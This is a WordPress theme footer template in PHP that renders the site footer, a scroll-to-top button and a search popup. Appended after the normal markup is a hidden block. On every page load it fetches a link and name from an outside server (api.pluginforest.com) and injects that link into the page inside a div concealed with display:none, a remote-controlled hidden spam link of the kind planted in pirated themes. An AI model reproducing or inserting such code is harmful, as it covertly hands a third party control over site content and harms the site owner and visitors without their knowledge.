<?php
$options = optcare_WSH()->option();
$allowed_html = wp_kses_allowed_html( 'post' );
$image_logo = $options->get( 'image_normal_logo' );
$logo_dimension = $options->get( 'normal_logo_dimension2' );
$logo_type = '';
$logo_text = '';
$logo_typography = '';
global $wp_query;
$page_id = ( $wp_query->is_posts_page ) ? $wp_query->queried_object->ID : get_the_ID();
$options = optcare_WSH()->option();
?>

<?php optcare_template_load( 'templates/footer/footer.php', compact( 'page_id' ) );?>

<?php if($options->get( 'to_top' ) ):?>
<!-- scroll to top -->
<button class="scroll-top scroll-to-target" data-target="html">
	<i class="fal fa-long-arrow-up"></i>
</button>	
<?php endif; ?>
<!--Search Popup-->
<div id="search-popup" class="search-popup">
	<div class="popup-inner">
		<div class="upper-box clearfix">
			<figure class="logo-box pull-left">
				<?php echo optcare_logo( $logo_type, $image_logo, $logo_dimension, $logo_text, $logo_typography ); ?>
			</figure>
			<div class="close-search pull-right"><span class="far fa-times"></span></div>
		</div>
		<div class="overlay-layer"></div>
		<div class="auto-container">
			<div class="search-form">
				<form method="get" action="<?php echo esc_url( home_url( '/' ) ); ?>">
					<div class="form-group">
						<fieldset>
							<input type="search" class="form-control" name="s" value="" placeholder="<?php echo wp_kses( $options->get( 'search_text_v1'), $allowed_html ); ?>" required >
							<button type="submit"><i class="far fa-search"></i></button>
						</fieldset>
					</div>
				</form>
				
			</div>
		</div>
	</div>
</div>
</main>
<?php wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
